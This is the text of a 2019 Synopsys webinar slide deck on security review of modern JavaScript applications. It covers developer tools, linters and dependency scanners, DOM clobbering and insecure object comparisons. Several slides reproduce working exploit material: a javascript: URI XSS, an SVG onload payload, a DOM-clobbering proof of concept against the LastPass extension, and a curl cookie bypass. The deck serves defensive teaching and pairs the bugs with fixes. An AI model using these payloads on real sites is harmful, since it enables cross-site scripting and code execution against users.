SlideShare a Scribd company logo

Webinar–Reviewing Modern JavaScript Applications

Synopsys Software Integrity Group
Synopsys Software Integrity Group

During a recent webinar, Lewis Ardem, senior security consultant at Synopsys presented "Reviewing Modern JavaScript Applications. " For more information, please visit our website at www.synopsys.com/software

Software
1 of 44
© 2019 Synopsys, Inc.1 Reviewing Modern JavaScript Applications Lewis Ardern, Senior Security Consultant, Synopsys Software Integrity Group April 29, 2019
© 2019 Synopsys, Inc.2 About me Senior Security Consultant, Synopsys Software Integrity Group – Consultant at formerly Cigital Prior to Cigital • B.Sc. in computer security and ethical hacking – Founder of the Leeds Ethical Hacking Society • Software developer • Security consultant About Synopsys • Historically all about hardware • Software Integrity Group formed to tackle software • Team consisting of well-known organizations – Black Duck – Coverity – Codenomicon – Cigital – Codiscope twitter.com/LewisArdern Lewis Ardern Senior Consultant Software Integrity Group SIG Consulting
© 2019 Synopsys, Inc.3 JavaScript landscape
© 2019 Synopsys, Inc.4 JavaScript landscape • Runs everywhere: browsers, servers, mobile, IoT devices • Lots of frameworks, high levels of abstraction • Move toward safe-by-default frameworks Database MongoDB Server Node.js/Express.js Client Angular
© 2019 Synopsys, Inc.5 Life as we know it “For the sixth year in a row, JavaScript is the most commonly used programming language.” —2018 Stack Overflow Developer Survey https://insights.stackoverflow.com/survey/2016
© 2019 Synopsys, Inc.6 Let’s not be REACTive! • Frameworks can offer enormous security benefits at the expense of outpacing existing security tools • It is important to understand the specific security characteristics and guarantees of any framework you deploy • Framework features can sometimes be abused – http://blog.portswigger.net/2017/09/abusing-javascript- frameworks-to-bypass.html • Teams transition / adopt different frameworks in rapid succession
© 2019 Synopsys, Inc.7 Modern JavaScript analysis Security professionals need to embrace developer tools to effectively identify security issues • Live in the browser console • Debug effectively • Weaponize developer tools to identify security issues • Commercial products (not covered today)
© 2019 Synopsys, Inc.8 What today’s talk covers Real-life examples from domain-specific experts Recommended tools to use Lesser-known JavaScript bugs
© 2019 Synopsys, Inc.9 Example 1 • One of the _known_ edge cases with React is that you can provide URI schemes such as `javascript:alert(0)` and get cross-site scripting via an `href` tag • In this HackerOne report, cross-site scripting led to remote code execution due to the steam:// URI used to interact with the steam client https://hackerone.com/reports/409850
© 2019 Synopsys, Inc.10 Video @zemnmez cross-site scripting against https://steamcommunity.com
© 2019 Synopsys, Inc.11 What did we see? Using the Chrome Developer Console • Beautifying the code • Searching for functions • Debugging client-side values • Overriding values on the fly inside the console • Backticks to bypass controls Knowledge of React pitfalls https://hackerone.com/reports/409850
© 2019 Synopsys, Inc.12 Example 2 LiveOverflow’s pop-under RE • Anti-debugging • Various bypass techniques • Deobfuscating JavaScript • Debugging locally • Using proxies • Weird browser quirks https://www.youtube.com/watch?v=8UqHCrGdxOM
© 2019 Synopsys, Inc.13 Example 3 Gareth Heyes’ AngularJS research • Deep understanding of JavaScript • Auditing framework code • DOM manipulation • Inspecting objects && prototype overriding https://portswigger.net/blog/dom-based-angularjs-sandbox-escapes https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
© 2019 Synopsys, Inc.14 Products that perform JavaScript dataflow analysis: • Coverity Scan • LGTM Tools that look for areas of interest: • Tarnish • JSHint • JSLint • ESLint – Code Climate—nodesecurity plugin • TSLint – tslint-angular-security Tools that look for known issues in JavaScript libraries: • Retire.js • npm audit • yarn audit • GitHub • Snyk • auditjs Tools that deobfuscate JavaScript: • Closure Compiler • JStillery • unminify JavaScript analysis tools Referencing only projects that either are open source or scan open source
© 2019 Synopsys, Inc.15 React https://chrome.google.com/webstore/detail/react-developer- tools/fmkadmapgofadopljbjfkapdkoienihi?hl=en AngularJS https://chrome.google.com/webstore/detail/angularjs- batarang/ighdmehidhipcmcojjgiloacoafjmpfk?hl=en Angular https://augury.rangle.io/ Vue https://github.com/vuejs/vue-devtools Framework analysis browser extensions Just because “production mode is set” doesn’t mean they can’t be used for live apps https://lh3.googleusercontent.com/GjX6Q3_FVJfc0DqE2wiPKkgOfth6otzV-D7GV- wB6sH5_t1oodMaHOBLsYOLeydb85bKWu6X=w640-h400-e365
© 2019 Synopsys, Inc.16 Known issues in JavaScript libraries Always check for known security issues • GitHub automatically reports security issues • Depending on project type, use tools: Example Command npm npm audit yarn yarn audit bower auditjs --bower bower.json Client-side JavaScript retire --js /path/ Node.js open source snyk test
© 2019 Synopsys, Inc.17 ESLint • ESLint is an open source pluggable linting utility for JavaScript • Linters parse ASTs to identify code quality and security issues • ESLint was created to allow developers to enforce rules • Can be hooked into the development release cycle – Many developers do not allow code to be pushed with ESLint issues flagged – You can create Git hooks – Can be part of CI/CD pipeline • Allows custom rules to enforce domain specific guidance
© 2019 Synopsys, Inc.18 ESLint ESLint is now the go-to tool for JavaScript developers https://stateofjs.com/2017/other-tools/
© 2019 Synopsys, Inc.19 ESLint security rules ESLint can help security consultants look for points of interest Default security rule configs • Node.js https://github.com/nodesecurity/eslint-config-nodesecurity • Vanilla JS https://github.com/mozfreddyb/eslint-config-scanjs • AngularJS https://github.com/LewisArdern/eslint-plugin-angularjs-security-rules • React https://github.com/yannickcr/eslint-plugin-react#list-of-supported-rules Security rules • eslint-plugin-scanjs • eslint-plugin-security • eslint-plugin-react • eslint-plugin-angularjs-security • eslint-plugin-no-wildcard-postmessage • eslint-plugin-no-unsafe-innerhtml • vue/no-v-html • eslint-plugin-prototype-pollution-security-rules
© 2019 Synopsys, Inc.20 Problem: In AngularJS security assessments, I want to identify problem locations quickly Solution: Create ESLint rules to run on every assessment as a starting point: JavaScript analysis tools for AngularJS https://www.npmjs.com/package/eslint-plugin-angularjs-security-rules
© 2019 Synopsys, Inc.21 Steps to create a rule 1. Create a test with true positive and false positive 2. Walk the JavaScript AST and identify your requirements 3. Create a rule from the AST output 4. Make sure the test passes
© 2019 Synopsys, Inc.22 Creating a test
© 2019 Synopsys, Inc.23 Identifying the requirements
© 2019 Synopsys, Inc.24 Create the rule
© 2019 Synopsys, Inc.25 Testing the rules https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 https://github.com/bkimminich/juice-shop
© 2019 Synopsys, Inc.26 Lesser-known security issues Let’s talk about lesser-known bugs!
© 2019 Synopsys, Inc.27 DOM clobbering Due to DOM specifications, certain HTML attributes have the ability to create values in JavaScript http://jibbering.com/faq/names http://thespanner.co.uk/2013/05/16/dom-clobbering Attributes can be used to define JavaScript values • id • action • form – input – name This can lead to: • Cross-site scripting (XSS) • Remote code execution (RCE) in browser extensions
© 2019 Synopsys, Inc.28 DOM clobbering <html> <head> </head> <body> <test id=“value" foooo=“value" action=“exists"><form> <div id=“valueExists" name=“exists"><form> <script> if (value.action !== undefined) { alert('Dom Clobbering’) } if (value.foooo !== undefined) { // Value does not exist } if (valueExists !== undefined) { alert('DOM Clobbering’) } if (valueExists.exists !== undefined) { // Value does not exist } </script> </body> </html>
© 2019 Synopsys, Inc.29 DOM clobbering <html> <body> <form><input name="ownerDocument"></form> <script> console.log(document.forms[0].ownerDocument) // Should return window.document // Returns <input name="ownerDocument"> </script> </body> </html>
© 2019 Synopsys, Inc.30 DOM clobbering // Exploit Code From Mario’ talk https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34 // Exploit <a href="plugins/preview/preview.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">Click me for dolphins!</a> // Vulnerable Code <script> var doc = document; doc.open(); doc.write(window.opener._cke_htmlToLoad); doc.close; delete window.opener._cke_htmlToLoad </script> Exploit that achieved cross-site scripting in CKEditor https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34
© 2019 Synopsys, Inc.31 Demo DOM clobbering
© 2019 Synopsys, Inc.32 DOM clobbering function lp_url_is_lastpass(e) { if (null == e) return !1; var t = /^https://([a-z0-9-]+.)?lastpass.(eu|com)//i , n = "https://lastpass.com/"; if ("undefined" != typeof base_url && (n = base_url), 0 == e.indexOf(n) || 0 == e.indexOf("https://lastpass.com/") || 0 == e.indexOf("https://lastpass.eu/")) return !0; if ("undefined" != typeof g_loosebasematching) { var i = lp_gettld_url(e); return new RegExp(i + "/$").test(base_url) } return t.test(e) } ... "openattach" == t.eventtype.value ? sendBG({ cmd: "openattach", attachkey: t.eventdata1.value, data: t.eventdata2.value, mimetype: t.eventdata3.value ... Exploit that achieved remote code execution in LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6 Can be set with: x = document.createElement("a"); x.setAttribute("id", "base_url"); Can be set defined with <value id="g_loosebasematching" /> Used to send Remote Procedure Calls (RPC) leading to RCE
© 2019 Synopsys, Inc.33 DOM clobbering <html> <head> <script> function start() { x = document.createElement("a"); x.setAttribute("id", "base_url"); x.setAttribute("href", "//" + document.location.hostname); document.body.appendChild(x); exploit.submit(); } </script> </head> <body onload="start()"> <exploit id="g_loosebasematching" /> <form id="exploit" name="lpwebsiteeventform"> <input type="hidden" name="eventtype" value="openattach"> <input type="hidden" name="eventdata1" value="d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec"> <input type="hidden" name="eventdata2" value="!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ=="> <input type="hidden" name="eventdata3" value="other:./../../../../../Desktop/exploit.bat"> <form> </body> </html> Exploit that achieved remote code execution in LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
© 2019 Synopsys, Inc.34 DOM clobbering https://bugs.chromium.org/p/project-zero/issues/attachment?aid=277766&signed_aid=cHmKiER3b1GkZKd_e_0PAA==&inline=1
© 2019 Synopsys, Inc.35 Insecure object comparisons Similar to DOM clobbering, there are many other ways insecure comparisons can happen const SESSIONS = {} const mustBeAuthenticated = (req, res, next) => { if(req.cookies) { const token = req.cookies.token if(token && SESSIONS[token]) { //allow it next() } } res.send('not authorized!') }
© 2019 Synopsys, Inc.36 Comparison table Value Return SESSIONS['invalidString'] False SESSIONS[''] False SESSIONS['constructor'] True SESSIONS['hasOwnPropery'] True
© 2019 Synopsys, Inc.37 What happens when you create an object in JavaScript? const test = {} __proto__: constructor: ƒ Object() hasOwnProperty: ƒ hasOwnProperty() isPrototypeOf: ƒ isProrotypeOf() [...] test['constructor'] === test.constructor //returns true
© 2019 Synopsys, Inc.38 Exploit • This issue is trivial to exploit • Using curl, we can simply run the following command: – curl https://localhost:9000 -H "Cookie: token=constructor" • Alternatively, we can just set the document.cookie value via the browser
© 2019 Synopsys, Inc.39 Demo Insecure object comparisons
© 2019 Synopsys, Inc.40 SESSIONS.has('__proto__'); // false SESSIONS.has('validString'); // true How do we correctly check? Or you can use a Map instead of an Object SESSIONS.hasOwnProperty['__proto__'] // false SESSIONS.hasOwnProperty['validString'] // true
© 2019 Synopsys, Inc.41 Note on authentication • Use a well-tested library like Passport to do authentication –http://www.passportjs.org/ • If rolling your own, use crypto.timingSafeEqual(a, b) –It provides a safe comparison –Also prevents timing attacks!
© 2019 Synopsys, Inc.42 Other issues Prototype pollution • https://www.youtube.com/watch?v=LUsiFV3dsK8 • https://github.com/HoLyVieR/prototype-pollution-nsec18 • https://www.slideshare.net/LewisArdern/dangerous-design-patterns-in-one-line • https://github.com/LewisArdern/eslint-plugin-prototype-pollution-security-rules • https://gist.github.com/LewisArdern/db02e6c37b69c7cb4f1059dc9e536923 Mass assignment • https://talks.amanvir.io/forward-js-san-francisco-security-issues-in-modern-javascript-Jan- 2019.pdf • https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet • https://www.npmjs.com/package/mongoose-mass-assign
© 2019 Synopsys, Inc.43 Summary • Adopt and embrace developer tools to identify security issues • Conduct regular code reviews • Measure and track your code quality and security • Automate the process: – ESLint for code linting and npm audit for dependencies – Various static analysis tools for quality and security – Break your CI build if any issues get flagged
Thank You Questions? Email: lewis@ardern.io Website: https://ardern.io Twitter: https://twitter.com/LewisArdern GitHub: https://github.com/LewisArdern LinkedIn: https://www.linkedin.com/in/lewis-ardern-83373a40

Recommended

DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon
 
Hybrid Cloud Networking
Hybrid Cloud NetworkingHybrid Cloud Networking
Hybrid Cloud Networking
SVForum Cloud SIG
 
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Codemotion
 
Using CredHub for Kubernetes Deployments
Using CredHub for Kubernetes DeploymentsUsing CredHub for Kubernetes Deployments
Using CredHub for Kubernetes Deployments
VMware Tanzu
 
DevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security SuccessDevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security Success
Puma Security, LLC
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
(Isc)² secure johannesburg
(Isc)² secure johannesburg (Isc)² secure johannesburg
(Isc)² secure johannesburg
Tunde Ogunkoya
 
DevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security SuccessDevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security Success
Puma Security, LLC
 

Recommended

DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon London 2019: Workshop: Cloud Agnostic Security Testing with Scout S...
DevSecCon
 
Hybrid Cloud Networking
Hybrid Cloud NetworkingHybrid Cloud Networking
Hybrid Cloud Networking
SVForum Cloud SIG
 
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Build advanced chat bots - Steve Sfartz - Codemotion Amsterdam 2017
Codemotion
 
Using CredHub for Kubernetes Deployments
Using CredHub for Kubernetes DeploymentsUsing CredHub for Kubernetes Deployments
Using CredHub for Kubernetes Deployments
VMware Tanzu
 
DevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security SuccessDevSecOps: Key Controls for Modern Security Success
DevSecOps: Key Controls for Modern Security Success
Puma Security, LLC
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
(Isc)² secure johannesburg
(Isc)² secure johannesburg (Isc)² secure johannesburg
(Isc)² secure johannesburg
Tunde Ogunkoya
 
DevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security SuccessDevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security Success
Puma Security, LLC
 
OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
Lewis Ardern
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Cloud Native Java with Spring Cloud Services
Cloud Native Java with Spring Cloud ServicesCloud Native Java with Spring Cloud Services
Cloud Native Java with Spring Cloud Services
Chris Sterling
 
Kubernetes for the Spring Developer
Kubernetes for the Spring DeveloperKubernetes for the Spring Developer
Kubernetes for the Spring Developer
VMware Tanzu
 
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
Cisco DevNet
 
Microservices and containers networking: Contiv, an industry leading open sou...
Microservices and containers networking: Contiv, an industry leading open sou...Microservices and containers networking: Contiv, an industry leading open sou...
Microservices and containers networking: Contiv, an industry leading open sou...
Codemotion
 
Serverless Security: A How-to Guide @ SnowFROC 2019
Serverless Security: A How-to Guide @ SnowFROC 2019Serverless Security: A How-to Guide @ SnowFROC 2019
Serverless Security: A How-to Guide @ SnowFROC 2019
James Wickett
 
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugManual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A Bug
Lewis Ardern
 
Elevate Your Application Security Program with Burp Suite and ThreadFix
Elevate Your Application Security Program with Burp Suite and ThreadFix Elevate Your Application Security Program with Burp Suite and ThreadFix
Elevate Your Application Security Program with Burp Suite and ThreadFix
Denim Group
 
Secure your Application with Google cloud armor
Secure your Application with Google cloud armorSecure your Application with Google cloud armor
Secure your Application with Google cloud armor
DevOps Indonesia
 
Getting Single Page Application Security Right
Getting Single Page Application Security RightGetting Single Page Application Security Right
Getting Single Page Application Security Right
Philippe De Ryck
 
The DevSecOps Builder’s Guide to the CI/CD Pipeline
The DevSecOps Builder’s Guide to the CI/CD PipelineThe DevSecOps Builder’s Guide to the CI/CD Pipeline
The DevSecOps Builder’s Guide to the CI/CD Pipeline
James Wickett
 
Demystifying AuthN/AuthZ Using OIDC & OAuth2
Demystifying AuthN/AuthZ Using OIDC & OAuth2Demystifying AuthN/AuthZ Using OIDC & OAuth2
Demystifying AuthN/AuthZ Using OIDC & OAuth2
NGINX, Inc.
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Romansh Yadav
 
Mobile security part 2
Mobile security part 2Mobile security part 2
Mobile security part 2
Romansh Yadav
 
How to Secure Containerized Applications
How to Secure Containerized ApplicationsHow to Secure Containerized Applications
How to Secure Containerized Applications
DevOps.com
 
The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019
James Wickett
 
Securing Container-Based Applications at the Speed of DevOps
Securing Container-Based Applications at the Speed of DevOpsSecuring Container-Based Applications at the Speed of DevOps
Securing Container-Based Applications at the Speed of DevOps
WhiteSource
 
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CDSynopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
Synopsys Software Integrity Group
 
Webinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for DevelopersWebinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for Developers
Synopsys Software Integrity Group
 
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Webinar–Creating a Modern AppSec Toolchain to Quantify Service RisksWebinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Synopsys Software Integrity Group
 

More Related Content

What's hot

How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Cloud Native Java with Spring Cloud Services
Cloud Native Java with Spring Cloud ServicesCloud Native Java with Spring Cloud Services
Cloud Native Java with Spring Cloud Services
Chris Sterling
 
Elevate Your Application Security Program with Burp Suite and ThreadFix
Elevate Your Application Security Program with Burp Suite and ThreadFix Elevate Your Application Security Program with Burp Suite and ThreadFix
Elevate Your Application Security Program with Burp Suite and ThreadFix
Denim Group
 
Demystifying AuthN/AuthZ Using OIDC & OAuth2
Demystifying AuthN/AuthZ Using OIDC & OAuth2Demystifying AuthN/AuthZ Using OIDC & OAuth2
Demystifying AuthN/AuthZ Using OIDC & OAuth2
NGINX, Inc.
 
How to Secure Containerized Applications
How to Secure Containerized ApplicationsHow to Secure Containerized Applications
How to Secure Containerized Applications
DevOps.com
 
Securing Container-Based Applications at the Speed of DevOps
Securing Container-Based Applications at the Speed of DevOpsSecuring Container-Based Applications at the Speed of DevOps
Securing Container-Based Applications at the Speed of DevOps
WhiteSource
 

What's hot (20)

OWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript ApplicationsOWASP SF - Reviewing Modern JavaScript Applications
OWASP SF - Reviewing Modern JavaScript Applications
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
Cloud Native Java with Spring Cloud Services
Cloud Native Java with Spring Cloud ServicesCloud Native Java with Spring Cloud Services
Cloud Native Java with Spring Cloud Services
 
Kubernetes for the Spring Developer
Kubernetes for the Spring DeveloperKubernetes for the Spring Developer
Kubernetes for the Spring Developer
 
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
when Apps meet Infrastructure - CodeMotionMilan2018 Keynote - Cisco DevNet - ...
 
Microservices and containers networking: Contiv, an industry leading open sou...
Microservices and containers networking: Contiv, an industry leading open sou...Microservices and containers networking: Contiv, an industry leading open sou...
Microservices and containers networking: Contiv, an industry leading open sou...
 
Serverless Security: A How-to Guide @ SnowFROC 2019
Serverless Security: A How-to Guide @ SnowFROC 2019Serverless Security: A How-to Guide @ SnowFROC 2019
Serverless Security: A How-to Guide @ SnowFROC 2019
 
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugManual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A Bug
 
Elevate Your Application Security Program with Burp Suite and ThreadFix
Elevate Your Application Security Program with Burp Suite and ThreadFix Elevate Your Application Security Program with Burp Suite and ThreadFix
Elevate Your Application Security Program with Burp Suite and ThreadFix
 
Secure your Application with Google cloud armor
Secure your Application with Google cloud armorSecure your Application with Google cloud armor
Secure your Application with Google cloud armor
 
Getting Single Page Application Security Right
Getting Single Page Application Security RightGetting Single Page Application Security Right
Getting Single Page Application Security Right
 
The DevSecOps Builder’s Guide to the CI/CD Pipeline
The DevSecOps Builder’s Guide to the CI/CD PipelineThe DevSecOps Builder’s Guide to the CI/CD Pipeline
The DevSecOps Builder’s Guide to the CI/CD Pipeline
 
Demystifying AuthN/AuthZ Using OIDC & OAuth2
Demystifying AuthN/AuthZ Using OIDC & OAuth2Demystifying AuthN/AuthZ Using OIDC & OAuth2
Demystifying AuthN/AuthZ Using OIDC & OAuth2
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
 
Mobile security part 2
Mobile security part 2Mobile security part 2
Mobile security part 2
 
How to Secure Containerized Applications
How to Secure Containerized ApplicationsHow to Secure Containerized Applications
How to Secure Containerized Applications
 
The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019
 
Securing Container-Based Applications at the Speed of DevOps
Securing Container-Based Applications at the Speed of DevOpsSecuring Container-Based Applications at the Speed of DevOps
Securing Container-Based Applications at the Speed of DevOps
 
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CDSynopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
Synopsys Security Event Israel Presentation: Making AppSec Testing Work in CI/CD
 

Similar to Webinar–Reviewing Modern JavaScript Applications

Webinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for DevelopersWebinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for Developers
Synopsys Software Integrity Group
 
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Webinar–Creating a Modern AppSec Toolchain to Quantify Service RisksWebinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Synopsys Software Integrity Group
 
Bridging the Security Testing Gap in Your CI/CD Pipeline
Bridging the Security Testing Gap in Your CI/CD PipelineBridging the Security Testing Gap in Your CI/CD Pipeline
Bridging the Security Testing Gap in Your CI/CD Pipeline
DevOps.com
 
A Tale of Two Pizzas: Accelerating Software Delivery with AWS Developer Tools
A Tale of Two Pizzas: Accelerating Software Delivery with AWS Developer ToolsA Tale of Two Pizzas: Accelerating Software Delivery with AWS Developer Tools
A Tale of Two Pizzas: Accelerating Software Delivery with AWS Developer Tools
Amazon Web Services
 

Similar to Webinar–Reviewing Modern JavaScript Applications (20)

Webinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for DevelopersWebinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for Developers
 
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Webinar–Creating a Modern AppSec Toolchain to Quantify Service RisksWebinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
Webinar–Creating a Modern AppSec Toolchain to Quantify Service Risks
 
Webinar–AppSec: Hype or Reality
Webinar–AppSec: Hype or RealityWebinar–AppSec: Hype or Reality
Webinar–AppSec: Hype or Reality
 
Devopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about securityDevopsdays london: Let’s talk about security
Devopsdays london: Let’s talk about security
 
Bridging the Security Testing Gap in Your CI/CD Pipeline
Bridging the Security Testing Gap in Your CI/CD PipelineBridging the Security Testing Gap in Your CI/CD Pipeline
Bridging the Security Testing Gap in Your CI/CD Pipeline
 
Webinar–Vulnerabilities in Containerised Production Environments
Webinar–Vulnerabilities in Containerised Production EnvironmentsWebinar–Vulnerabilities in Containerised Production Environments
Webinar–Vulnerabilities in Containerised Production Environments
 
Webinar – Risk-based adaptive DevSecOps
Webinar – Risk-based adaptive DevSecOps Webinar – Risk-based adaptive DevSecOps
Webinar – Risk-based adaptive DevSecOps
 
RSA Conference Presentation–Creating a Modern AppSec Toolchain to Quantify Se...
RSA Conference Presentation–Creating a Modern AppSec Toolchain to Quantify Se...RSA Conference Presentation–Creating a Modern AppSec Toolchain to Quantify Se...
RSA Conference Presentation–Creating a Modern AppSec Toolchain to Quantify Se...
 
DevOps Spain 2019. Pedro Mendoza-AWS
DevOps Spain 2019. Pedro Mendoza-AWSDevOps Spain 2019. Pedro Mendoza-AWS
DevOps Spain 2019. Pedro Mendoza-AWS
 
DevNetCreate Workshop - build a react app - React crash course
DevNetCreate Workshop - build a react app - React crash courseDevNetCreate Workshop - build a react app - React crash course
DevNetCreate Workshop - build a react app - React crash course
 
BSides Leeds - Performing JavaScript Static Analysis
BSides Leeds - Performing JavaScript Static AnalysisBSides Leeds - Performing JavaScript Static Analysis
BSides Leeds - Performing JavaScript Static Analysis
 
A Tale of Two Pizzas: Accelerating Software Delivery with AWS Developer Tools
A Tale of Two Pizzas: Accelerating Software Delivery with AWS Developer ToolsA Tale of Two Pizzas: Accelerating Software Delivery with AWS Developer Tools
A Tale of Two Pizzas: Accelerating Software Delivery with AWS Developer Tools
 
CI/CD best practices for building modern applications - MAD301 - Santa Clara ...
CI/CD best practices for building modern applications - MAD301 - Santa Clara ...CI/CD best practices for building modern applications - MAD301 - Santa Clara ...
CI/CD best practices for building modern applications - MAD301 - Santa Clara ...
 
AWS DevDay Cologne - CI/CD for modern applications
AWS DevDay Cologne - CI/CD for modern applicationsAWS DevDay Cologne - CI/CD for modern applications
AWS DevDay Cologne - CI/CD for modern applications
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021
 
Blockchain development using Hyperledger Composer
Blockchain development using Hyperledger ComposerBlockchain development using Hyperledger Composer
Blockchain development using Hyperledger Composer
 
From Zero to DevOps Superhero: The Container Edition (JenkinsWorld SF)
From Zero to DevOps Superhero: The Container Edition (JenkinsWorld SF)From Zero to DevOps Superhero: The Container Edition (JenkinsWorld SF)
From Zero to DevOps Superhero: The Container Edition (JenkinsWorld SF)
 
Dev ops on aws deep dive on continuous delivery - Toronto
Dev ops on aws deep dive on continuous delivery - TorontoDev ops on aws deep dive on continuous delivery - Toronto
